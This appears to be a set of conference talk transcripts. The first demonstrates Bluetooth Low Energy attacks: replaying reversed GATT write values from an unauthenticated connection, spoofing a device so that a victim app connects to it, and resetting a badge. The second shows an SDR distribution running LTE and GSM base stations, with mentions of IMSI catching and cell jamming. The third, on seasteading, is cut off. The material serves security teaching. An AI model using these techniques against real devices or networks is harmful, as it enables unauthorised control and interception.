the Ubertooth can follow connections, but I can't see inside the ones that are encrypted. Crackle is largely ineffective these days for breaking pins, so good luck there. I know there has been some research into attacking the entropy of the pins being generated, so that's a potential avenue, but as far as I know there isn't currently a reliable way of breaking pairing pins. Commercial sniffers are also really expensive, and the cheaper alternatives really don't outperform the Ubertooth. So, a few approaches to BLE. First, sniff the broadcast traffic; look from the outside in. Is it encrypted? What can you see? What is the device leaking? What could you potentially do without any kind of interaction with the device? Is there any kind of information leak, or any issue with the configuration? The next step is to look from the inside out, using something like Android Debug Bridge and looking at the unencrypted packets coming in. ADB allows you to look at the Bluetooth Low Energy packets once they've crossed the HCI threshold; they've been stripped of the encryption layer, and you can actually see the commands getting sent over the wire. Then, attempt an out-of-app connection: just try to use nRF Connect, connect to a device, see if you can create a paired or bonded session, and then start fuzzing values and see what interaction you get. Sometimes you'll get devices to lock out, sometimes you'll get devices to actually do what they're supposed to, and sometimes you hit the trigger.
And then the next thing is to spoof a device or check for cloning protections within the application itself. So these are kind of the four things that I really look for in a pen test. So hopefully that helps you kind of frame and contextualize what we're going to look at here in a second. So let's get into some hands-on stuff. So short list of equipment. The Nordic thingy 52, Bluefruit LE, the LG M150, the Samsung S20 I'll be using as the victim. But I will also be showing you the screens that the attacker would see on that phone. It's just kind of a technology and display matter at this point. So, and then we'll of course be using InterfConnect. We'll be using the thingy app, then the Bluefruit Connect application will also be using ADB and Wireshark. For an external scan, we're going to start with Uber tooth. And we're going to go through the basic setup. I just set this up on my computer. If you go to the the GitHub page and go to their wiki for the Uber tooth, there are really good setup instructions. You just go line by line. I didn't have any issues on the newest version of Cali, so hopefully you don't. But yeah, you never know. This is where we will be using ADB to do a live capture of the BT Snoop file on our LG M150. So, let me get the phone hooked up here. We are going to launch ADB. So, we would launch by using ADB start server. Mine's already started, but we'll just hit it again. And then we use ADB devices. And you can see our LG M150 is right there. So, I plugged a different phone in. And we can see the device that I'm using here to capture the BT Snoop file on. We go over to Wireshark, which I already have started. And we can see that we have this BT Snoop interface that's opened up here. Now, it's important to note that the LG M150 has to be running Android version 7. So, I just tried this a second ago with a different LG that I have, and it's running version 6. And it does not open up the BT Snoop. So, you'll have to actually update the version of Android. Luckily, we have pre-recorded videos this time, so I can go in and actually edit out some of that stuff. So, we have our BT Snoop file here. Let's go ahead and start the sniffer. So, our sniffer is now running from our phone. So, I have the phone connected here. And what we can do is start trying to connect to devices. So, for instance, I have this thingy52 on the desk here. I can turn this on, and I can open up Interf Connect. And you'll see the packets are starting to come in here. So, we can see I'm going to connect to the thingy device here, and you'll see the packets start to change. We can create a connection to our thingy52 using the thingy connect app. And now that I'm connected, I'm actually reading data from this device, from the thingy52 onto my phone. So, I can do things like play sounds. Now, that's as I'm pressing here. You hear the sound on the thingy52? So, those commands are coming through the GAT services. Commands are being written from our phone to the GAT services that are being offered on the thingy52. So, since we have this hooked up in an internal fashion, and we can see these packets, we can actually see what commands are controlling what. So, if I hit this tone, we can see that there are packets coming across. Send right here. And this is the value that's being written to that GAT service. So, let's try a different key. Okay. Let's see if that value has changed. You can see it's changed to an 8, from a 5 to an 8. I would also suspect that 1 is the on and off, right? 
So, the first right is the on, the second right is the off. You can see all f's in the middle there, and then we see all 0's in the middle. All f's, all 0's. Okay. So, that's a pretty basic look at how we see commands, and we're able to reverse command values that come across the wire internally. So, how do we actually then interact with or take this information and use it to then test if there is any unauthorized access to the GAT services, or if we can get any interaction to the device from an unauthenticated source? So, let me bring up the screen here, and I'm going to use my victim device here, or in this case, my attacking device, to actually seek out the thingy52 here over nrf connect. So, this would constitute an out of application connection. Since the thingy52 has an application that controls all of the interactions, using an application like nrf connect to directly interact with the GAT services would be considered an out of app interaction. So, let me scan. So, we have this thing here, that's my thingy52. We'll go ahead and connect to that. So, you can see right off the bat, we have a connection, but it's not bonded. You'll also notice up here in the right hand corner is the DFU button. That will actually allow us to push firmware updates over the air. So, not all devices, and most consumer devices will be locked down from this, but not all devices will have this. But if you do see this, this would constitute a fairly major vulnerability in this device, especially since we have a short-term connection, since there hasn't been long-term key information passed. Let's go ahead and open up our sound services. So, when we were looking at the other screen here, let me go to Kelly and phone. So, when we were looking at the other commands that we captured from the internal, from the ADB capture, we saw our read and write commands. So, those were being written to the handle 005B, and that was in the sound service. So, let's look in the sound here. So, if we open up the handle, we can see the full UUID there. Okay, so the thingy speaker data characteristic is what we saw being written to. So, we can actually use this upload command. So, we have write permissions to it, and we can use this value that we have here. So, we have 8701FFF5A. So, let's try and push this. This was a write command. So, let's make sure that it's placed in command. You have the option between request or command, and this was sent as command X52. So, we'll send it as a command, and we'll see if we can get any interaction here between our device and our attacking device. There it is. There it is. So, we're now attacking from there, and just like I thought, so the all F command is the on command. So, when we saw the write, that was the F. So, we've sent it the option to be on. So, it's on right now, and you can hear it in that tone. So, now let's write the off command. So, that was 8701 0005A, and we send that as a command, and now it's off. So, that is a very robust look at your basic GAT hacking. We abused an unauthenticated out-of-application connection to a device, our thingy52 in this case, and we used a command that we reversed from other information into getting this interaction from an attacking device. So, say this was something else. Say this was, I don't know, I don't know what kind of user device you would have, but say it had some purpose, and you had this in your pocket, but it also made noise like that. 
And say somebody had reversed these commands and knew that these devices were vulnerable, or that you could just arbitrarily write these commands to GAT services. So, if you could walk around, identify that these devices were, or when they were in proximity, you could automatically attack these devices so that everybody was walking around that had one of these in their pockets, they would automatically get this tone just going off in their pocket, and they would have to shut the device off. So, you can see where there is user impact, and there's also a circumventing of protections that are in place for Bluetooth low energy. So, successful GAT hacking there. Let's switch over to some more slides here. But we used the internal scan to reverse the Bluetooth commands that we saw coming across the wire, and then we used that in an out-of-application attack. So, let's move into cloning some services. So, this will enable us to really attack the application. Generally, there isn't a lot of value in spoofing against a peripheral, say like spoofing a user device. Although, I have seen that be, you know, a valid find where you can impersonate a legitimate user's phone, and then there is some interaction with the device. But without the long-term keys that have been passed, there's a really, you have an uphill battle basically in trying to spoof a user device against a peripheral. So, what we are going to do is spoof a peripheral device, and we are going to watch the victim attach to it from their application, and basically see all of the interactions that you normally would, and you don't even know that you haven't connected to your device. Meanwhile, if we were to push this further, what that would enable me to do is get a bonded session with my target. So, I would have those long-term keys exchanged with my target and be able to then exploit that further. So, I could either use some sort of proof of concept or, you know, have that deeper interaction with that user's device. So, what we're going to do is we are going to be spoofing the the blue fruit LE. I'm going to push some of this other stuff out of the way here for a second. I'm going to be spoofing the blue fruit LE. It's a real simple development tool. Adafruit has all these kinds of kits that you can use. This is intended for development. It's intended to learn with and to explore how Bluetooth development works. But why we're using it is because it has its own application and one that does not have spoofing protections in it. So, it's easy to basically prove this cloning concept. So, let me plug things in. You can see we've got power now there. Okay, so you can see that we have power there. The blue fruit module is on. So, what I'll be doing on my device is leveraging the scanner. So, I'm going to scan for devices right now. Hopefully we see this blue fruit pop up somewhere. Oh, there we go. Freaky Zen Sinister Sun Hat was a project that I had for Defconn last year, but it didn't quite make it all the way. What we're going to do is we're going to clone here this clone button. So, what I'm doing is I'm cloning the advertisement data now. So, basically, I'll be able to impersonate the adafruit unit on the advertisement channels. So, now that we've cloned it, what we can do is we can actually connect to the device. And we connect to it to get a return on the GAT services that are available. So, now that we've connected to, we can go here up into the upper right hand corner and we can go to clone device services. 
And you can see the little box popped up there and we've cloned the GAT services now. So, we've cloned the advertisement profiles and we've cloned the GAT profiles. So, now if we're able to turn these on, we're basically impersonating that device. So, what we have to do is then go to the GAT server and we have to turn on the GAT server to mimic the sun hat. So, there we have the GAT services turned on. And what we also have to do is go to go to our advertiser and we turn on the advertisement for the Freaky Zinn Sinister Sun Hat. So, now we are impersonating this device and hopefully we will get a connection to our target device. So, now that we've cloned all of the GAT services, what we have to do is go into the advertiser, turn on the advertiser for the Sinister Sun Hat, and then we also have to go in and change the name of the device. We're now advertising as a spoofed sun hat. So, we will update our scan here on the Adafruit LE app. And we can see the Phoenix 3. This is actually the name of the phone. So, the name didn't update on the phone. So, let's try and connect to it. And it allows us to connect to it as if it were the sun hat. So, the Phoenix 3 is this phone. This is my attacker phone. So, I've created a spoof from this phone and I've now got a connection in the application, in the Blue Fruit Low Energy application. And from there, it's not giving us the right information because we're not getting returns on that. However, if I go to the server information here on my attacker, I can change things like my manufacturer string. This is an attacker. We can set that. Now, we should be able to see that pop up there. You see it. Now, we've provided information on our attacker on the GAT service for the manufacturer name. So, now the end user is seeing that if we had a device that had more functionality, we could potentially send information from this device. Say we spoofed a thingy 52 and we spoofed or we sent temperature data out from there and this red temperature data. So, think about that in a real world example where say a building is relying on BlueTooth Low Energy sensors to control HVAC. Say we are able to impersonate one of those sensors and then provide fake information to whatever is reading that temperature and then making the judgments on what should be done about that temperature. If we can then create a scenario where it thinks maybe the temperature is rising uncontrollably, maybe there's cooling systems or maybe it kicks on the fire suppression systems or something. So, there is the risk of spoofing something and then providing information from that spoof. But I also have a connection now, a bonded connection to my target device that I could potentially exploit even further. So, we just went through the basic pieces. We cloned the advertisement data. We changed our device name. We cloned the device services. We went through and turned on the advertiser and then we actually connected through and provided a spoof that our victim connected to. So, I do want to introduce HackNAR's BLE CTF that it runs on ESP32. Like I said, if you've ever been to any of my in-person training sessions, I generally give these out to as many people as I can. So, I have maybe 10 or 20 of these that I give out. But obviously, since we are all safe mode and social distancing, then I can't really give a bunch of these out. But they're like $10 and you can upload all the information yourself. And you can actually go through a BLE CTF and it's more of just interacting on GAT services. 
That builds on what we went through earlier with abusing write privileges. There are a bunch of challenges on there; some of them involve decoding MD5 hashes or following certain instructions that you get back from the services. So if you have an interest in exploring more on the GATT side, I would definitely recommend checking out Hackgnar's BLE CTF, and of course, if you need help, feel free to reach out to me on Twitter or wherever. Now, a few recommendations for the individual BLE user, your everyday consumer. Keep your Bluetooth turned off unless you really need it. I know that with the prevalence of Bluetooth Low Energy devices, I find my Bluetooth being turned on more and more and kept on for longer and longer, so this might not be valid advice in a few years; we may just always have to deal with Bluetooth being on. Choose low-traffic areas to do your PIN pairing sessions in. While it is fairly unlikely that there will be significant leakage of keys or pins, there is a chance that it could happen, so you're better off choosing a controlled RF space where you know there aren't going to be a lot of people eavesdropping. Generally your home is a good option, or maybe an uninhabited part of your office. Also, be aware that, like we saw with the Bluefruit LE app, a lot of apps don't have spoofing protection, so you could very well be connecting to something that is not what you thought it was, and you've allowed an attacker to either provide you with false information or gain a bonded connection to your phone that they could then further abuse. I would also say that there are enough free tools out there that you could just start auditing all the Bluetooth devices around you: can I abuse the GATT services? Can I create a spoof of this device? How does the application handle that? You might need two phones for that, but yeah. And of course, if you want to get deeper into it, maybe pick up a dedicated testing phone like an LG M150, and make sure it's running Android 7. So those are a few of my recommendations for consumers. As far as developers: I'd like to push out-of-band pairing options, just because it moves some of that very privileged and important information away from the channel that is being used for data. Using something like NFC to pass the long-term keys will increase the security, or really the integrity, of the Bluetooth data, because you don't run the risk of using a basically unprotected channel to pass the keys that then protect it; you're using out-of-band practices. Don't focus solely on device security, either. Does your application have good spoofing protections? Is your app basically looking for devices by name alone, or is it checking something deeper? What I like to dream about and recommend is a remote server where you can validate a device's keys before you ever connect to it, through the cloud. Say the application on your phone has a connection to a cloud server somewhere: before you even start a connection with a device, the advertising data and that key, the short-term key, would be passed up to your cloud and validated, and if it's not valid then obviously you wouldn't connect, or you could blacklist it or something like that. So that's what I tend to recommend.
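Purely as an illustration of that last recommendation: none of this is a real vendor API, and a real design would validate a provisioned key or a challenge-response rather than just an address (which a spoofer can clone), but here is a toy sketch of what the app-side check could look like.

```python
# A purely hypothetical sketch of the "ask your backend before you connect" idea.
# The endpoint and fields are invented for illustration; this only shows the plumbing.
import requests

API = "https://example.invalid/api/devices"       # placeholder backend URL

def should_connect(serial: str, advertised_addr: str) -> bool:
    """Return True only if the backend vouches for this serial/address pair."""
    resp = requests.get(f"{API}/{serial}", timeout=5)
    if resp.status_code != 200:
        return False                               # unknown device: refuse
    record = resp.json()
    if record.get("revoked", False):
        return False                               # backend has blacklisted this serial
    return record.get("ble_addr", "").lower() == advertised_addr.lower()
```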
As far as further study goes, there are a number of Bluetooth researchers out there, but probably the one I follow the most, and the most enthusiastic, is Jiska. I think I'm saying that right. She is a security researcher and, yeah, an RF kind of wizard out of Europe, so follow her on Twitter; she does a lot of talks all over the place. If you're looking for books, Hacking Exposed Wireless is amazing. I just went through the coursework for the GAWN and it's very, very similar; obviously it's written by the same people, so of course there's going to be some knowledge overlap. And if you're looking to get more hands-on, then the Adafruit Bluefruit LE, the Thingy:52, ESP32s, and the UD100 Bluetooth USB adapter, which we didn't cover in this talk but is capable of doing more long-range work, are definitely things you'll want to pick up if you have an interest in taking this further. Okay, so with the badge just turned on, you can see the Bluetooth mesh pop up in nRF Connect, even though I'm not able to connect to that directly. I am able to see the AND!XOR badge within nRF Connect, and the Bluetooth mesh you see there is listed as such. I can try to connect to the badge, and when I get a connection it gives me certain options. I've done some poking around on this side, but I haven't found a lot. This SMP characteristic might be fun to poke around with. What I have seen is that within the SMP characteristic you can actually do some interesting commands with the write values here: OS echo commands, so you can echo commands through Bluetooth into the operating system. I haven't gotten much interaction from that, and I've tried the Bender commands, but they haven't really worked. The one that I have seen work very well is the reset command. So I'll switch over here, and as soon as I hit the reset command, you'll see the badge turn off. And there it goes; the badge turns off. Last year at DEF CON they were talking about the Bluetooth mesh where you could attack other people's devices: you could connect to the badges and send these commands, turn people's badges off, or make them do different things with different commands. So it's a very cool puzzle, a great interactive tool for learning. If you have one of these AND!XOR DC27 badges, and I believe the one before that also had a Bluetooth mesh on it, they would be awesome to hack on, since they have that Bluetooth component. That's going to wrap up my presentation. I just want to thank you for spending the time with me today and learning about Bluetooth Low Energy hacking. Hopefully you learned something, hopefully something caught your interest, and you're ready to explore the Bluetooth Low Energy devices around you. Don't forget the further study resources I put out in one of the last slides. If you have any questions, feel free to reach out to me on Twitter or LinkedIn or anywhere, really, and I will try my best to get in touch with you; I know sometimes I don't do a great job of that. So thank you so much for joining me, and I hope you have a wonderful, wonderful DEF CON Safe Mode.
|
Evolving over the past twenty-two years, Bluetooth, especially Bluetooth Low Energy (BLE), has become the ubiquitous backbone modern devices use for low-energy communications. From mobile to IoT to automotive, most smart devices now support Bluetooth connections, meaning that this attack vector is becoming an increasingly important aspect of security testing. This talk will break down the various phases of testing Bluetooth devices, with an emphasis on sniffing BLE connections, spoofing devices, and exploiting GATT services. We will cover key components of the Bluetooth protocol stack and the tools required to start testing BLE in your home or as part of a Bluetooth pentest. This talk will also demonstrate that all you need to start testing BLE is an Android or iOS device and a bit of curiosity.
|
10.5446/51662 (DOI)
|
Alright, good morning, afternoon, evening, whatever time it is when you get around to watching this. I'm pretty excited to be participating for the first time in DEF CON. I really wish I could be there in person, obviously; it would be far easier to present this if I were able to see people face to face, and you would see my passion and excitement, even if you might not hear it in my voice. This is a project I have been working on since about the beginning of the year, maybe even into last year, and that is DragonOS Focal. Like I said, my name is Aaron, and this is DEF CON 2020 Safe Mode. So we'll go down through here; I've got just a few slides and then we'll go right into showing you what DragonOS is. Some background on it: right before COVID-19 I was personally working on some tools to try to aid in teaching software defined radios, SDRs, so I had that going for me. And then a couple of projects way back, around 2008 or 2009, I built mesh networking gear; some of you may be familiar with Open-Mesh back then and the OM1P. I was kind of on my own, using open source and the RouterStation, which everyone probably had at one point or another, and with a few other people we built and sold dual-radio mesh equipment all over the world. Around that same time I was pretty active in the ZoneMinder forums for some reason or another, and I noticed that people had a lot of problems compiling things and building ZoneMinder from source. So I thought, well, why not use Remastersys to help people out and get it all prebuilt and working? I took those two things together, and it got me thinking about doing another distribution. And then of course COVID-19 hit really big, and a lot of people were stuck at home, so I thought, why not take my little project to the next level, get it out to the public so people could install something fairly new in terms of software, for free, and get into software defined radios while they were stuck at home? I put that out to the public, a lot of people were interested in it, and RTL-SDR.com and Hackaday did a few articles. I just copied and pasted one article here that, as you can see, was dated March 24, 2020; it talks a little bit about the project, and if you look online you'll find a lot more articles. As for the progress I've made: I started with Debian Buster and just called it DragonOS 10. Debian is probably my favorite; I had a lot of tools in there, and you can find that on SourceForge. I just got to a point where I wanted to be able to support disk encryption and UEFI, so I moved on to Lubuntu 18.04 and called that DragonOS LTS. The bulk of my time was spent making that, and I think I've made the most videos on it. I should point out, too, that even though I went from Debian to Lubuntu, I tried to keep all the distributions as close as possible in terms of the tools and applications installed, so for the most part any of the videos I've made should apply to any of the builds, hopefully. Anyways, now I'm on Lubuntu 20.04, and I just call that DragonOS Focal. So yeah, the goal: I don't even know how many hours, countless hours, spent pre-installing anything I could possibly find that would be of interest to people who are into software defined radios, whether from repositories, deb packages, source, and so on.
And I try to combine it all and spend and just be meticulous about everything working together. So you know, from remastering it to installing it to testing the whole installation to checking every possible software-defined radio I can with it, or at least that I've owned or have been donated. You know, I have B205 here, USRP radio, RTL-SDR, Blade RF, some SDR play equipment. The SDR play people were extremely helpful in sending me some equipment out. That's been really awesome. Ubertooth from Hackers Warehouse, they were really nice, sent some equipment out. And then as I kind of go through, I'll point out, I'll say thanks to a lot of people that have helped just with input and kind of behind the scenes discussion on what software is out there and what to include. All right, so let's get out of the slides here. And you know, I try to do everything within DragonOS, which is running right now, my latest build, which is I was going to put out in conjunction with this. I just kept it still a beta build, DragonOS, Focal, public beta 3. That's what's running this right now. I have to admit I was not familiar with OBS and making videos like this, so hopefully it comes out okay. So we'll get down off the slides here. This is DragonOS. I know it doesn't look like much. You're just looking at the desktop here. But this is running live from a USB stick. I've made it as easy as I can. You can see there's a little icon on the desktop. I've actually already ran through the installer, but I will show how easy it is to get it to install. I'll come through here, answer a few questions. I'll just uncheck this for now, just so that it's not hanging here and you all are staring at this screen while it's loading. So yeah, okay. So it's not going to, I'm not going to make this video over again, but just trust me, I've already ran through the installer and it finished. Normally you would reboot. That's why you see that error pop up there. Anyways, I'll just let that run in the background. That was kind of to show you how easy it is to install, I guess, lesson learned. Don't run it twice within the same as it's running live, but it's kind of hard with it. I have everything set up to make this video. So anyways, one of the big things, I'll just go right down the list. I wanted to demonstrate here so you can get an understanding of why is this any different than any other distribution. You've got Kali out there for your offensive security or pen testing. I just tried to make this distribution all about software defined radios. So base Lubuntu system with everything installed on top of it. One I'll point right out at the front. I've actually got it running here. SIG Digger that I've put in here, built from source, find this program really great. The developer has been super awesome. I know he was trying to help me out to have a TV decoder, I guess you'd say, with sync and everything ready for this. But I think you all will see that here in the near, real near future. So keep an eye on that. But what I'll show you is SIG Digger running using the B205 Mini that I have here. And if you happen to have, so I have a 5 GHz antenna on it, I've got a 5 GHz FPV cam sitting here. So if you open up your sample rate and your bandwidth, you should be able to do what I'm doing here, which is, we'll look at this in the spectrum. I've got my window open as far as I can here. I've got a inspection tab open here. And then I've got an FSK inspector. So that's another thing. 
When I make these videos, I try to get people interested in what these different acronyms, like FSK, mean. I don't explain everything, but I hope I generate enough interest that people will go out and do some more research. So I've opened up the FSK inspector here; let's open this up the whole way. Let's close out of this and open another inspector. You would bump up your bits per tone and start the clock recovery. I come up here, left-click and drag to open this aperture up, release, uncheck the fit-to-window option, and click record, and come down to about the 550 mark or so, and you should see where I left off here. And this is live; it's capturing this live. I had actually hoped to record the whole video like this, but not in such a way that I'd give everyone a seizure or something. So I felt that this is a really unique, very powerful signal analysis tool, and that's literally out of the box, running live. You don't have to use a B205; I've actually done this with a HackRF, so as long as you can get into the 5 GHz range, you should be fine. I'm sure I could probably do it with some of the bladeRFs that go up that far; this is a bladeRF micro xA4, I think. And that's really not even the primary feature of that symbol stream window; it just happens to be able to do this. I'm sure if you pause you'll see me, and yeah. Anyways, I'm going to close out of this and change a couple of things here. What I want to show next, as quickly as I can with a few terminal windows, is something else that is on here and running out of the box. I'll grab a few cellular antennas here, and I'm sure a lot of you are familiar with srsLTE. I had a big interest in getting LTE, and actually GSM as well, running out of the box; I know there's a lot of interest in that. Obviously you've got to have shielding and so on when you're transmitting any of this, so I just recommend being careful when you're doing any of what I'm showing here. So, srsLTE: this just shows you how fast we can get up and running. We want to start our core network, our EPC, here, and bring that online. Then we would start our eNB. For this I've found that it will use the Ettus by default. These two commands start up the core network and then bring up your eNB. That failure you see there is SoapySDR complaining about SDRplay: what I've done is, when you run the installer and then reboot, you'll be presented with a little pop-up that prompts you to install the SDRplay API. So that'll happen, your user will be added to the Kismet group, and everything just kind of works out of the box; I know I keep saying that. So with these two commands here, and of course this fails right when I do the presentation, with those two you can be up and broadcasting your base station, basically. If you had a second laptop and another Ettus or a bladeRF, which I have demonstrated in some of the YouTube videos, you can use a virtual handset through that radio to connect. So yeah, that's how easy it is; that's all pre-configured and working. And you can do the same in my latest build with GSM now.
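Before we move on to the GSM side, here is roughly what that two-command LTE bring-up amounts to, wrapped in a small script. The srsepc and srsenb binary names are the stock srsLTE ones; the config paths are assumptions, so point them at wherever your install keeps its configs, and only transmit into a shielded enclosure or dummy load.

```python
#!/usr/bin/env python3
# A minimal sketch of the two-command srsLTE bring-up. Binary names are the
# stock srsLTE ones; config paths are assumptions for your install.
import subprocess
import time

epc = subprocess.Popen(["sudo", "srsepc", "/etc/srslte/epc.conf"])  # core network (EPC) first
time.sleep(3)                                                       # give the core a moment to come up
enb = subprocess.Popen(["sudo", "srsenb", "/etc/srslte/enb.conf"])  # then the eNB, which drives the Ettus/bladeRF

try:
    enb.wait()          # run until you Ctrl+C the eNB
finally:
    epc.terminate()     # then shut the core down
```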
I'm sure a lot of you are probably familiar with Osmocom. I've got the HLR, the BTS, the BSC, and the transmit side all in here, so you should be able to get a GSM base station up and working pretty quickly if you have an Ettus. So if we start up our BSC, and then start up the rest... okay, now you see we've got our base station online. I know there's an error here; that's actually something I'll address in the next build, but it's a pretty common thing, and it's explained on the Ettus site how to get around setting the thread priority. So there are three things working right out of the box: the ability to decode that 5 GHz video, the LTE network, and the GSM network. Something else that I do is keep everything that I install from source, anything that isn't a packaged installation, right there in the actual build when you finish installing it, so that you have all of the source you need to make any changes or uninstall anything you may want to remove. Let's see, I'll show another example here. GNU Radio 3.8 is in here. If we take a look, let's just take a look in GRC: you'll see right there you've got ADS-B, DECT2, and I've checked all of this. GSM in GNU Radio 3.8 works perfectly fine with the IMSI-catcher script. You've got Iridium there; I'm not super familiar with satellites, but I've included that. gr-tempest, I checked that and actually got it working with some SDRplay equipment and was able to view a monitor without having to use TempestSDR, which I know a lot of people use. So if you want to get into GNU Radio, which I recommend, you can take a look at one of the examples here, a real easy one. And again, I really feel like a benefit of this distribution is that you can run it live. If you don't want to install it, there may be some things that have issues running live, but for the most part it works pretty well. So this is GNU Radio; I'm sure a lot of people are familiar with this. Again, right out of the box, you've got your RDS example there, you've got your gain settings. I have gone through every application you can possibly think of on here: SDRTrunk, Airband, retrogram, everything. I have spent a lot of time making this work.
Same thing if you come down the list here. We've got CubicSDR, CubicSDR with SDRplay support. QSpectrumAnalyzer is really good to use with the HackRF. If you want to do some capture and replay attacks, you've got Universal Radio Hacker. I should have noted SDRplay support next to that one; actually, no, that does not have SDRplay support yet, it's still being worked on. Let's see what else. We've got Spike; a gentleman by the name of Rick, who suggested I do this video, is a big fan of that equipment and that program. And then really anything else that isn't installed with a nice, easy-to-click GUI, you can run from here and get an idea of what's available. Sparrow Wi-Fi, as a matter of fact: I know a lot of people are familiar with Kismet, but I suggest taking a look at Sparrow Wi-Fi too. It has some nice integration with the HackRF and the Ubertooth. I don't actually have my HackRF right now, but what you can do with Sparrow Wi-Fi is overlay the 2.4 GHz and 5 GHz spectrum on top of what your wireless NIC sees, which runs up at the top here. It does something similar to Kismet, but without the full packet capture and client enumeration; you'd see the access points. So, not to give away all my access points here, I'll just show you the spectrum analysis with the Ubertooth that's plugged in; thank you to Hacker Warehouse for letting me check that out. All right, I think that's enough programs. I've hit a lot of the big stuff, and I would encourage anyone who wants to know more to take a look at my YouTube page, cemaxecuter. You can go down through all of the videos I've put on there; I think there are about 60 or so, covering all sorts of different topics, from showing the installation, to doing capture and replay, to using the KerberosSDR for direction finding, a proof of concept on smart cell-phone jamming, signal analysis, SpyServer, everything you can think of. I've tried to cover it all and educate. So I think that about wraps it up. If you need to find the project, you can just Google DragonOS; add Focal if you want, that's the latest, and you'll find it on SourceForge. You've got your files there and you'll get the latest build. I appreciate everyone listening up to this point, and I just want to say thank you to the developer of SigDigger, to SDRplay for the equipment, to Hacker Warehouse, and, I'm drawing a blank right now because there have been so many, to everyone on YouTube who has provided suggestions or emailed me behind the scenes. I appreciate it. I hope this has been helpful during COVID-19; I know a lot of people have been stuck at home, so I just wanted to try to do what I could to help others. All right, thanks.
|
Intro; Why I started DragonOS; What is DragonOS; What problems and challenges I had to overcome; What companies and developers helped and who donated equipment
|
10.5446/51635 (DOI)
|
Hello and welcome to this presentation on seasteading. My name is Grant Roman. I'm from Ocean Builders and today we'll be talking about how to hack the sea pod. The sea pod, we'll talk about what that is a little bit later. People usually ask me first though, what is a seastead? Basically, a seastead is a home that is engineered to float on the ocean. People have been fascinated with living on the water, people have been fascinated with living on the ocean, and even the idea of building an entire city that floats on the ocean. This has been an idea for a very long time, but no one has actually done it. No one's cracked the code on this. We've seen some beautiful images, we've seen some beautiful pictures. Here's some conceptual drawings of images of these whole entire floating communities that were beautiful. The problem with them, the reason why this hasn't happened yet, is because this costs a lot of money to do. This is like a multi-billion dollar project just to get started, not even to really do very much at all. Building a city is a huge thing that is usually done in small increments where you can use a small increments, and then it grows bigger and bigger and bigger. To start something on the water, it actually costs a lot more than doing it on land. No one's really cracked the code on how to make it affordable to do. Until last year, February 3rd of 2019, something monumental happened and a huge milestone was made, and the first original prototype of the single home Seastead was launched. I'll just play the video here so you can see it. This was in Thailand, 13 miles off outside of the coast of Thailand by Phuket. It was beautiful, it was amazing. It was a beautiful thing, but the prototype itself was not very attractive, not very pretty. But the technology to do this is the same technology that is used on an oil rig where you have a deep spar that you can see a metal pole going into the water and the house actually just floats on top of it. But the metal pole goes really deep into the water and creates a source of buoyancy which pushes the house that's above the water up. Then you basically, your house is above the waves. You don't have to worry about big waves coming and making your house move around. It's actually very stable because of this, because you're not at the surface of the water level, so it's actually very stable and nice to live in. What I loved when I saw this was that I saw that this could be the new frontier. It's like many years ago, America was the new frontier. It was this new land to be discovered, new opportunities, incredible new opportunities. I believe that if we do this right on the ocean, that the ocean can be the new frontier. This is really exciting. I think there's so many technologies that can come from this. I kind of have the philosophy that we should do the ocean first and then Mars. It doesn't make any sense to spend tens of billions of dollars to send something to Mars when we can actually, for a very small fraction of that, we can start building thriving ecosystems on the ocean today, like right now. The technology is here. It's really exciting because I think maybe 10 years ago, we didn't have all the technology to do this, to make this feasible. But now all this technology is evolving, it's coming available very, very quickly. It's to the point where we can put all these technologies together and make them work and make a home on the ocean that is affordable and is eco-restorative and has all these other incredible benefits. 
I think the opportunities are very exciting. When I first was on the original Seastead by Thailand, it was really ugly. It was a diamond in the rough. You had to have a lot of imagination to see where it could go because it was not pretty. We've spent a lot of time since then to redesign it, to make it sexy, to make it beautiful, to make it inspiring, to want to actually live there. We have our new design model that is called the Seapod. Seastead is a basic class of this floating home idea. With every major innovation, major change, sometimes that is such a dramatic change that it causes fear in some people. That happened in Thailand. If you hadn't heard, our project became very well known because the Thai Navy actually decided to invade our Seastead. It was frontline headline news around the world. Most major newspapers, TV shows, radio programs covered the story because we were actually on the run for a long time. The Thai Navy was chasing our team and they were threatening the death penalty and life in jail and saying that this was a threat to, like this was an act of terrorism and all kinds of things. So at the time it was horrible, but now in retrospect it brought a lot of attention to the whole movement and I think it's helped a lot. But while it was going through it was kind of a little bit scary. So some of the media that's covered us is all the big names that you would recognize and know. So we almost ended up in one of these, which is a Thai prison, which is some place you don't want to end up. It does not look like a comfortable place to be at all. But as Chao said in the movie, the hangover, but did you die? And the answer is no, we didn't. And here is our hero picture to prove that we survived after the big rescue, which a whole book and movie is being written about because it had all the elements of James Bond thriller kind of movie. So it's pretty interesting what happened. So now we are in Panama. This is the location where we will be building the first community of homes. This is the exact island that we will be on where our manufacturing plant is in construction. This is the early pictures. This was back in February. We've gone a lot further now. These pictures have not been, these are the first time these pictures are being shown. This is our manufacturing plant now mostly built. We're still missing the front door, but that's okay because things are going on in the inside. So we're going to show you during the live part of the presentation here, we'll be showing you some more pictures, some of the things we've been building, some of the things we're putting in the water. And so, and we'll talk about a lot of the technologies we're going to be developing. And that's one of the really exciting things about this thing is that to be able to live on the water, we need to develop so many different kinds of technologies and so many, we need to innovate so many different things that haven't existed before because we haven't had a need to live on the water and do it in a way that's eco-sustainable because the way we've built homes and built a life for ourselves on land has not been good for the environment. We usually clear cut a forest before we put a house out and that's just not good. But when we put something in, when we build something in the water, it actually becomes a habitat for life and we're trying to do it in a way that life can actually thrive and actually add more life to the ocean instead of damaging it. 
So there's a lot of really innovative technologies we're working on for the seapod and we're really excited about a lot of these things. We have a huge 3D printer, we'll show you some pictures of that later. It's 20 feet long by 16 feet wide and 8 feet tall and our goal is to eventually be able to print an entire house with a 3D printer. We're not there yet, we're right now starting with printing molds and then making the houses from the molds itself. There's a lot of IoT technology we're developing, home automation for a home on the water which is very different. We're developing hydroponics so your home can be self-sufficient. We're developing aquaculture systems, coral gardens so you can actually instead of having a front lawn with a garden, you'll actually have an underwater coral garden potentially as an option. There's aquatic transport drones we're building to be able to transport garbage and take out the garbage basically to take out the trash. You'd have an automated drone that comes out and does that. We have desalinization technology we're developing, there's marine sensor stations we're developing so we can get advanced notice on what the weather is going to be like and what the marine conditions are like and we can actually monitor what the conditions of the ocean are so we can actually measure over a sustained period of time or a long period of time what the environmental impact of living on the water is. We can actually show scientifically that our homes are actually helping to restore coral in the area because we're going to be doing a number of different projects to help restore the marine ecosystem. Not just one thing is to be able to print, 3D print a coral design that has the optimal shape that coral polyps love to live in. We can do that by scanning existing coral and see the exact shape of a little nook that they like to live in so we can recreate that in 3D printing designs. Then there's other techniques, there's like five or six different techniques for doing coral restoration that we're developing as well and 